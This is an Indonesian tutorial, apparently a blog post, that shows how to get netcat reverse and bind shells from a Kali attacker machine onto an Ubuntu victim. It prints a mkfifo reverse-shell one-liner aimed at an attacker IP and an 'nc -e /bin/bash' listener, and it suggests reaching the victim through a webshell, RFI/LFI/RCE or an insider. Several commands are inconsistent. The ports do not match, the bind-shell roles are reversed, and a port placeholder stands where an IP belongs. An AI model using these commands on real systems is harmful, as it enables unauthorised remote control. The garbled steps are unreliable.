[TUTORIAL-6] Cara Melakukan Netcat Reverse Shell dan Bind Shell pada Linux Ubuntu Server
Hallo teman-teman researcher kali ini saya ingin membuat tulisan terkait bagaimana cara melakukan Netcat Reverse Shell dan Bind Shell pada linux Ubuntu server.
apa itu reverse shell ?
Reverse Shell adalah suatu kondisi dimana komputer penyerang/attacker dapat terhubungkan ke komputer target, dimana komputer penyerang/attacker pada kondisi mendengarkan (listening) untuk mengambil shell. untuk mendapatkan shell terget.
Apa itu bind shell ?
Bind shell adalah kebalikan dari Reverse Shell, yaitu shell yang dimulai dari attacker mencoba menghubungkan ke target, yang mana target berada pada kondisi mendengarkan (listening).
Ada banyak metode untuk melakukannya. Pada kesempatan ini kita akan mencoba menggunakan netcat saja.
Pada percobaan kali ini kita asumsikan komputer korban(ubuntu) memiliki ip address 192.168.233.134 Sedangkan komputer penyerang/attacker(kali) memiliki ip address 192.168.233.129, banyak yang bertanya, bagaimana menjalankan command tersebut di komputer sasaran? Banyak cara, yang jelas kita harus mendapatkan akses ke komputer korban atau bisa menjalankan command ke komputer korban, misalnya kita punya webshell di komputer korban, “atau kita ada orang dalam hahaha” yang sudah siap sedia di komputer korban untuk menjalankan perintah kita. Intinya kita harus bisa mengirimkan perintah ke komputer korban dan bisa saling berkomunikasi/ping, baik melalui rfi, webshell, lfi, rce, dll.
A. Reverse Shell
Pertama-tama ketikkan perintah “nc -lvp 4444” pada komputer penyerang/ attacker menjadi listener
· l untuk mode listen pada koneksi yang masuk
· v untuk verbose
· p [port] untuk spesifik port number
seperti illustrator gambar berikut.
Lalu lakukan perintah dibawah ini pada komputer korban, supaya shell dapat berjalan.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <IP ATTACKER> 1234 >/tmp/f
Dapat dilihat pada session komputer penyerang/attacker, ada log informasi connect to 192.168.233.129 form 192.168.223.134 yang berarti komputer penyerang dapat terkoneksi dan memliki hak akses pada komputer korban.
Uji coba pembuatan folder mkdir berhasilbuatfolder
Dapat terlihat pada komputer korban, folder telah berhasil dibuat.
Kita telah berhasil melakukan reverse shell pada komputer korban/ubuntu. selanjutnya kita akan mencoba bind shell.
A. Bind Shell
Kita coba buat folder satu dua tiga empat lima pada komputer penyerang/attacker,
┌──(root㉿kali)-[/home]
└─# mkdir satu dua tiga empat lima
Lakukan perintah berikut pada komputer penyerang/attacker.
nc -nvlp 1234 -e /bin/bash
Selanjutnya pada perangkat korban jalankan syntax berikut.
nc -nv <PORT ATTACKER> 1234
kalau kita berhasil, akan ada pesan di komputer korban
“connection to 192.168.233.129 1234 port [tcp/*] successed!
Dan coba buat folder melalui pada komputer korban, seperti gambar illustrator dibawah ini.
Pada komputer penyerang/attacker juga terilhat informasi connect seperti halnya komputer korban.
Dapat dilihat pada komputer penyerang/attacker folder telah terbuat.
Reverse shell dan bind shell menggunakan netcut sudah berhasil dilakukan.
referensi